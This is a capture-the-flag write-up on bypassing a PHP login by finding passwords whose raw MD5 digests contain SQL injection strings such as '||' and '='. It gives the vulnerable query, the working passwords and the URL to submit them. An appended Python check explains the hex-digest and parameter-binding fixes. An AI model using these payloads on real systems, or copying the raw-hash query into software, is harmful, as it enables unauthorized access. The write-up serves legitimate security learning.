    $r = mysql_query("SELECT login FROM admin WHERE password='" . md5($_GET['password'], true) . "'");

Normally, web sites keep the password hash as a hex string. But this challenge keeps the raw hash (16 binary bytes) in the database. Binary data can be a string. So, to bypass the login, the output of md5 has to look like

    ' or 1=1#

The above string is what I thought of first. But it is too long. To make the brute forcing fast, the required output string should be short. After checking the MySQL docs, I could make it shorter. Here is the list of what I found:

    'or 1#   <== no need for space after single quote, any non-zero number is TRUE
    '||1#    <== || is same as OR, no need for space after ||

Before writing the code for brute forcing, I remembered I can put non-printable characters in the password using '%XX'. So 1 byte can take 256 values. No charset.
My code for brute forcing is http://pastebin.com/2xMG9rKi.
Ran it for about 20 minutes on my slow Windows PC, then got it.

    password: 34b854c8
    password: %34%b8%54%c8
    result: c13e807082277c7c36231ed0dd34a863
    result: ม>€p‚'||6# ะ4จc

Note: on Linux, compile with "gcc -O2 -lssl -o prog prog.c"
Note: If you want to see the result from my program quickly, run it with "./prog 4 4 200"

Submit it from the URL bar:

    url?password=%34%b8%54%c8

Then I got the real admin hash. It is "071CC0720D0ABD73F61A291224F248D6". But I could not reverse the admin hash :( so poor me. When I searched on Google, I found it on hashkiller, but it was not solved.
Below is not my solution
Before finishing this post, I found 2 other writeups of this challenge. Very nice solutions. They found shorter SQL injection strings.

First is http://cvk.posterous.com/sql-injection-with-raw-md5-hashes. The SQL injection string is

    '||'

Here is the modification of my code: http://pastebin.com/ThxBESPs. Got the result in a few minutes.

    password: 2c55c819
    password: %2c%55%c8%19
    result: 3157e727097c7c27342e7dc2729f75ed
    result: 1W็' ||'4.}ยrŸuํ

Second is http://blog.nibbles.fr/?p=2039. The SQL injection string is

    '='

Here is the modification of my code: http://pastebin.com/w5E54PNz. Got the result in a second.

    password: 22a80f
    password: %22%a8%0f
    result: 047f1f9ed77f467a273d279d8e521422
    result: žืFz'='ŽR "
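As an added example (not code from the original post or from the linked writeups), the following Python check takes the three password/digest pairs posted above and shows where each raw digest closes the quoted literal in the challenge query, then contrasts that with the hex form the post says sites normally store. The function names and the simplified quote scanner are assumptions made for illustration.

```python
import hashlib

# (password bytes as hex, raw MD5 digest as posted on this page).
# Values are copied from the page, not generated here.
PAGE_SAMPLES = [
    ("34b854c8", "c13e807082277c7c36231ed0dd34a863"),
    ("2c55c819", "3157e727097c7c27342e7dc2729f75ed"),
    ("22a80f",   "047f1f9ed77f467a273d279d8e521422"),
]
PREFIX = b"SELECT login FROM admin WHERE password='"

def build_query(value: bytes) -> bytes:
    """Mimic the PHP string concatenation from the challenge, on bytes."""
    return PREFIX + value + b"'"

def literal_ends_at(value: bytes):
    """Offset of the first byte that closes the '...' literal, or None.
    Simplified single-byte lexing (an assumption): backslash escapes the
    next byte and '' is an escaped quote."""
    i = 0
    while i < len(value):
        if value[i:i+1] == b"\\" or value[i:i+2] == b"''":
            i += 2
        elif value[i:i+1] == b"'":
            return i
        else:
            i += 1
    return None

def analyse(pw_hex: str, posted_hex: str) -> dict:
    """Inspect one posted digest and recompute it from the posted password."""
    posted = bytes.fromhex(posted_hex)
    end = literal_ends_at(posted)
    return {
        "recomputed_matches_page": hashlib.md5(bytes.fromhex(pw_hex)).digest() == posted,
        "literal_ends_at": end,
        "after_quote": posted[end + 1:] if end is not None else b"",
        "query": build_query(posted),
    }

def hex_form_is_safe(password: bytes) -> bool:
    """A hex digest is 32 characters of [0-9a-f], so it cannot close the literal."""
    return literal_ends_at(hashlib.md5(password).hexdigest().encode()) is None

if __name__ == "__main__":
    for sample in PAGE_SAMPLES:
        r = analyse(*sample)
        print(sample[0], r["recomputed_matches_page"], r["literal_ends_at"], r["after_quote"][:6])
    print("hex form safe:", all(hex_form_is_safe(bytes.fromhex(s[0])) for s in PAGE_SAMPLES))
```

Calling md5() without the raw flag, or binding the value as a parameter instead of concatenating it, keeps every digest byte inside the literal.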